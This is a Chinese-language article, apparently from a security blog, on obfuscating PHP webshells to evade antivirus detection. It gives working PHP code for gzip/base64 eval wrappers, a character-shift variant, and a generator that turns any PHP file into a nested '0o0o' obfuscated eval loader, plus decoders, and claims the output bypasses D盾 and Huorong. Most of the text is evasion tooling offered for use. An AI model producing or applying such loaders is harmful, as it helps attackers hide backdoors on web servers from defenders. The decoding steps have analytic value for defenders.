webshell加密免杀探究
字数 413 2025-08-22 12:23:30

WebShell加密免杀技术研究

一、基础WebShell加密技术

1. Gzip+Base64基础加密

加密原理

  • 使用gzdeflate函数压缩PHP代码
  • 使用base64_encode进行Base64编码
  • 最终通过eval(gzinflate(base64_decode()))执行

加密实现代码

<?php
function encode_file_contents($filename) {
    $type = strtolower(substr(strrchr($filename, '.'), 1));
    if ('php' == $type && is_file($filename) && is_writable($filename)) {
        $contents = php_strip_whitespace($filename);
        $headerPos = strpos($contents, '<?php');
        $footerPos = strrpos($contents, '?>');
        $contents = substr($contents, $headerPos + 5, $footerPos - $headerPos);
        $encode = base64_encode(gzdeflate($contents));
        $encode = '<?php' . "\n eval(gzinflate(base64_decode('" . $encode . "'))); \n ?>";
        return file_put_contents($filename, $encode);
    }
    return false;
}
$filename = 'phpinfo.php';
encode_file_contents($filename);
?>

解密方法

<?php
$a = "eval(gzinflate(base64_decode('40pNzshXKMgoyMxLy9fQtFawtwMA')));";
function decodephp($a) {
    $max_level = 300;
    for($i = 0; $i < $max_level; $i++) {
        ob_start();
        eval(str_replace('eval', 'echo', $a));
        $a = ob_get_clean();
        if(strpos($a, 'eval(gzinflate(base64_decode') === false) {
            return $a;
        }
    }
}
echo htmlspecialchars(decodephp($a));
?>

2. 高级Gzip+Base64加密

加密原理

  • 在基础加密上增加字符位移操作
  • 每个字符ASCII码减1进行二次混淆

加密实现代码

<?php
function iJG($BHM) {
    $BHM = gzinflate(base64_decode($BHM));
    for($i = 0; $i < strlen($BHM); $i++) {
        $BHM[$i] = chr(ord($BHM[$i]) - 1);
    }
    return $BHM;
}
eval(iJG("U1QEAm4QkVaelKupmhAYEBIao1yYVFJSUVCcqhynZcPtYA8A"));
?>

解密方法

<?php
function iJG($BHM) {
    $BHM = gzinflate(base64_decode($BHM));
    for($i = 0; $i < strlen($BHM); $i++) {
        $BHM[$i] = chr(ord($BHM[$i]) - 1);
    }
    return $BHM;
}
echo(iJG("U1QEAm4QkVaelKupmhAYEBIao1yYVFJSUVCcqhynZcPtYA8A"));
?>

二、0o0o嵌套混淆技术

1. 复杂嵌套混淆示例

加密代码

<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0[3].$O00OO0[6].$O00OO0[33].$O00OO0[30];
$O0OO00 = $O00OO0[33].$O00OO0[10].$O00OO0[24].$O00OO0[10].$O00OO0[24];
$OO0O00 = $O0OO00[0].$O00OO0[18].$O00OO0[3].$O0OO00[0].$O0OO00[1].$O00OO0[24];
$OO0000 = $O00OO0[7].$O00OO0[13];
$O00O0O .= $O00OO0[22].$O00OO0[36].$O00OO0[29].$O00OO0[26].$O00OO0[30].$O00OO0[32].$O00OO0[35].$O00OO0[26].$O00OO0[30];
eval($O00O0O("JE8wTzAwMD0iU0VCb1d4VGJ2SGhRTnFqeW5JUk1jbWxBS1lrWnVmVkpVQ2llYUxkc3J0Z3dGWER6cEdPUFdMY3NrZXpxUnJBVUtCU2hQREdZTUZOT25FYmp0d1pwYVZRZEh5Z0NJdnhUSmZYdW9pbWw3N3QvbFg5VEhyT0tWRlpTSGk4eE1pQVRIazVGcWh4b21UMG5sdTQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>

解密步骤

  1. 首先输出关键函数名:
echo $O00O0O;
  1. 然后输出第二层混淆代码:
$a = ($O00O0O("JE8wTzAwMD0iU0VCb1d4VGJ2SGhRTnFqeW5JUk1jbWxBS1lrWnVmVkpVQ2llYUxkc3J0Z3dGWER6cEdPUFdMY3NrZXpxUnJBVUtCU2hQREdZTUZOT25FYmp0d1pwYVZRZEh5Z0NJdnhUSmZYdW9pbWw3N3QvbFg5VEhyT0tWRlpTSGk4eE1pQVRIazVGcWh4b21UMG5sdTQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
echo $a;
  1. 将输出的第二层代码中的eval替换为echo:
$O0O000 = "SEBoWxTbvHhQNqjynIRMcmlAKYkZufVJUCieaLdsrtgwFXDzpGOPWLcskezqRrAUKBShPDGYMFNOnEbjtwZpaVQdHygCIvxTJfXuoiml77t/lX9THrOKVFZSHi8xMiATHk5FqhxomT0nlu4=";
echo htmlspecialchars('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));

2. 0o0o混淆生成器

实现代码

<?php
function RandAbc($length = ""){
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    return str_shuffle($str);
}

$filename = 'phpinfo.php';
$T_k1 = RandAbc();
$T_k2 = RandAbc();
$vstr = file_get_contents($filename);
$v1 = base64_encode($vstr);
$c = strtr($v1, $T_k1, $T_k2);
$c = $T_k1 . $T_k2 . $c;

$q1 = "O00O0O";
$q2 = "O0O000";
$q3 = "O0OO00";
$q4 = "OO0O00";
$q5 = "OO0000";
$q6 = "O00OO0";

$s = '$'.$q6.'=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$'.$q1.'=$'.$q6.'{3}.$'.$q6.'{6}.$'.$q6.'{33}.$'.$q6.'{30};$'.$q3.'=$'.$q6.'{33}.$'.$q6.'{10}.$'.$q6.'{24}.$'.$q6.'{10}.$'.$q6.'{24};$'.$q4.'=$'.$q3.'{0}.$'.$q6.'{18}.$'.$q6.'{3}.$'.$q3.'{0}.$'.$q3.'{1}.$'.$q6.'{24};$'.$q5.'=$'.$q6.'{7}.$'.$q6.'{13};$'.$q1.'.=$'.$q6.'{22}.$'.$q6.'{36}.$'.$q6.'{29}.$'.$q6.'{26}.$'.$q6.'{30}.$'.$q6.'{32}.$'.$q6.'{35}.$'.$q6.'{26}.$'.$q6.'{30};eval($'.$q1.'("'.base64_encode('$'.$q2.'="'.$c.'";eval($'.$q1.'($'.$q3.'($'.$q4.'($'.$q2.',$'.$q5.'*2),$'.$q4.'($'.$q2.',$'.$q5.',$'.$q5.'),$'.$q4.'($'.$q2.',0,$'.$q5.'))));').'"));';

$s = '<?php ' . $s . ' ?>';
echo $s;

$fpp1 = fopen('temp' . $filename, 'w');
fwrite($fpp1, $s) or die('写文件错误');
?>

密钥作用

  • T_k1:原始字母表
  • T_k2:替换后的字母表,形成一一对应的替换规则

三、免杀效果验证

经测试,上述加密方法能够绕过D盾和火绒杀毒软件的检测。

WebShell加密免杀技术研究 一、基础WebShell加密技术 1. Gzip+Base64基础加密 加密原理 使用 gzdeflate 函数压缩PHP代码 使用 base64_encode 进行Base64编码 最终通过 eval(gzinflate(base64_decode())) 执行 加密实现代码 解密方法 2. 高级Gzip+Base64加密 加密原理 在基础加密上增加字符位移操作 每个字符ASCII码减1进行二次混淆 加密实现代码 解密方法 二、0o0o嵌套混淆技术 1. 复杂嵌套混淆示例 加密代码 解密步骤 首先输出关键函数名: 然后输出第二层混淆代码: 将输出的第二层代码中的eval替换为echo: 2. 0o0o混淆生成器 实现代码 密钥作用 T_k1 :原始字母表 T_k2 :替换后的字母表,形成一一对应的替换规则 三、免杀效果验证 经测试,上述加密方法能够绕过D盾和火绒杀毒软件的检测。